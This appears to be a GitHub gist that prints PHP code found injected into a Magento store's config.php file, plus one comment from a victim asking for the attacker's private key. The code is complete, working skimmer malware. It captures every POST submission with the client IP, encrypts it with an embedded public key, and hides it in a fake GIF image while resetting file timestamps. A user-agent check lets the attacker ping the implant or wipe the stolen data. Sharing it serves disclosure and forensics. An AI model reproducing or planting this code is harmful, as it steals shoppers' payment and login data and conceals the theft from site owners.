The following was added to the magento includes/config.php file
| <?PHP | |
| $y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif'; | |
| $m1 = '1355773528'; | |
| $k2 = 'pccbe60c'; | |
| $k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
| if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') { | |
| if (isset($_GET[$k2])) { | |
| $m1 = file_exists($y0) | |
| ? @filemtime($y0) | |
| : $m1; | |
| @file_put_contents($y0, ''); | |
| @touch($y0, $m1, $m1); | |
| echo 'clean ok'; | |
| } else { | |
| echo 'Pong'; | |
| } | |
| exit; | |
| }if (!empty($_SERVER['HTTP_CLIENT_IP'])) { | |
| $i4 = $_SERVER['HTTP_CLIENT_IP']; | |
| } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { | |
| $i4 = $_SERVER['HTTP_X_FORWARDED_FOR']; | |
| } else { | |
| $i4 = @$_SERVER['REMOTE_ADDR']; | |
| }if (isset($_POST) && sizeof($_POST)) { | |
| $a5 = ''; | |
| foreach ($_POST as $h6 => $n7) { | |
| if (is_array($n7)) { | |
| foreach ($n7 as $f8 => $l9) { | |
| if (is_array($l9)) { | |
| foreach ($l9 as $l10 => $v11) { | |
| if (is_array($v11)) { | |
| ; | |
| } else { | |
| $a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11; | |
| } | |
| } | |
| } else { | |
| $a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9; | |
| } | |
| } | |
| } else { | |
| $a5 .= ':' . $h6 . '=' . $n7; | |
| } | |
| } | |
| $a5 = $i4 . $a5; | |
| } else { | |
| $a5 = null; | |
| }if ($a5) { | |
| $t12 = false; | |
| if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists( | |
| 'openssl_encrypt' | |
| ) | |
| ) { | |
| $t12 = true; | |
| } elseif (function_exists('dl')) { | |
| $n13 = strtolower(substr(php_uname(), 0, 3)); | |
| $d14 = 'php_openssl.' . ($n13 == 'win' | |
| ? 'dll' | |
| : 'so'); | |
| @dl($d14); | |
| if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists( | |
| 'openssl_encrypt' | |
| ) | |
| ) { | |
| $t12 = true; | |
| } | |
| } | |
| if ($t12) { | |
| $t15 = @openssl_get_publickey($k3); | |
| $q16 = 128; | |
| $t17 = ''; | |
| $h18 = md5(md5(microtime()) . rand()); | |
| $e19 = $h18; | |
| while ($e19) { | |
| $f20 = substr($e19, 0, $q16); | |
| $e19 = substr($e19, $q16); | |
| @openssl_public_encrypt($f20, $h21, $t15); | |
| $t17 .= $h21; | |
| } | |
| $t22 = @openssl_encrypt($a5, 'aes128', $h18); | |
| @openssl_free_key($t15); | |
| $a5 = $t17 . ':::SEP:::' . $t22; | |
| } | |
| $m1 = file_exists($y0) | |
| ? @filemtime($y0) | |
| : $m1; | |
| @file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND); | |
| @touch($y0, $m1, $m1); | |
| }?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Ben749 commentedJun 20, 2016
Hi, does anyone have his private key, so I could parse the 378Mo pseudo image file to know which postdata have been stolen ??